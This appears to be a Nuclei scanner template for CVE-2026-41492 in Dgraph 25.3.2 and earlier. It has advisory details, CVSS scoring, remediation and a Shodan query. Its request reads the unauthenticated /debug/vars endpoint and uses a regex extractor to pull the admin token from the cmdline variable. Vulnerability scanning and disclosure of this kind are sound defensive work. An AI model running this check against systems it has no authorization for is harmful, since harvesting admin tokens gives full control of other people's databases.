id: CVE-2026-41492 info: name: Dgraph <= 25.3.2 - Admin Token Disclosure author: Divine Balija severity: critical description: | Dgraph <= 25.3.2 contains an information disclosure caused by unauthenticated access to the /debug/vars endpoint , which publishes the cmdline variable including the --security token= flag, letting unauthenticated remote attackers retrieve the admin token and access admin-only endpoints, exploit requires no authentication. impact: | Unauthenticated attackers can retrieve the admin token and gain full administrative control over the Dgraph instance. remediation: | Update to Dgraph version 25.3.3 or later. reference: - https://github.com/dgraph-io/dgraph/security/advisories/GHSA-vvf7-6rmr-m29q - https://nvd.nist.gov/vuln/detail/CVE-2026-41492 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-41492 epss-score: 0.03082 epss-percentile: 0.86298 cwe-id: CWE-200 metadata: verified: true max-request: 1 vendor: dgraph product: dgraph shodan-query: "Dgraph" tags: cve,cve2026,dgraph,exposure,token http: - method: GET path: - "{{BaseURL}}/debug/vars" matchers-condition: and matchers: - type: word part: body words: - "cmdline" - "token=" condition: and - type: word part: content_type words: - "application/json" - type: status status: - 200 extractors: - type: regex part: body group: 1 regex: - 'token=([^"\\]+)' # digest: 4b0a0048304602210096b16fbbe3a2a2cffcf6b41d8646c440c3f1b92caea8c11ee52318befdda958b0221009fc54021a9f10ab66cf685b8a1ce1160aa20e27dc6e0d1f26f90078b5b7f7bc5:922c64590222798bb761d5b6d8e72950